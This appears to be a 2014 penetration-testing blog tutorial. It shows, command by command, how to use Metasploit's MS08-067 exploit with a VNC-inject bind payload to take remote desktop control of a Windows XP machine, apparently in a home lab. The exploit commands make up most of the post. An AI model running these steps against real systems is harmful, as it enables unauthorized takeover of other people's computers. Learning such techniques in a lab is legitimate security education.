Saturday, April 12, 2014

Hacking Windows : Totally own it - Hollywood Style

Now while the real life hacking and the one in the movies might seem far from congruent, there is some similarity at least, and in this post, we'll get no shells, no meterpreter, no bullshit. We'll simply get the Windows XP desktop inside our Kali machine like we actually are on it. What we're actually getting is going to be something like this-




If you have any difficulty understanding whats going on, then that's because you skipped over 5 articles on penetration testing. You are recommended to go over last 3 atleast.

Starting metasploit

You must be having Kali Linux installed, follow the link if you haven't already got Kali Linux.

After that, execute the following commands on terminal to get Metasploit running
service postgresql start
service metasploit start
msfconsole
After this, you metasploit framework will start.

Information Gathering

  • Find IP of XP machine by running ipconfig on XP command prompt.
  • Find IP of Kali machine by running ifconfig on Kali terminal.

Hacking XP 

Now execute the following code (without the msf> it is there by already) -
msf > use exploit/windows/smb/ms08_067_netapi
It selects the netapi ms08 exploit which is well known for Windows XP. Now execute the following (everything before > will already be there)
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/bind_tcp 
 Now execute a show options to get an idea what all values need to be filled.
msf  exploit(ms08_067_netapi) >show options
You will need the information gathered from Information Gathering step. Remember - XP -> Remote host (RHOST). This is all we need. Just enter the XP IP instead of 192.168.xxx.xxx
msf  exploit(ms08_067_netapi) > set RHOST 192.168.xxx.xxx
That would be all. Now type exploit and press enter.
msf  exploit(ms08_067_netapi) > exploit
If everything goes right, then you'll have a pretty much movie kind of remote connection working for you, and you'll be able to work stuff like you'd normally do if you had access to the machine.

No comments:

Post a Comment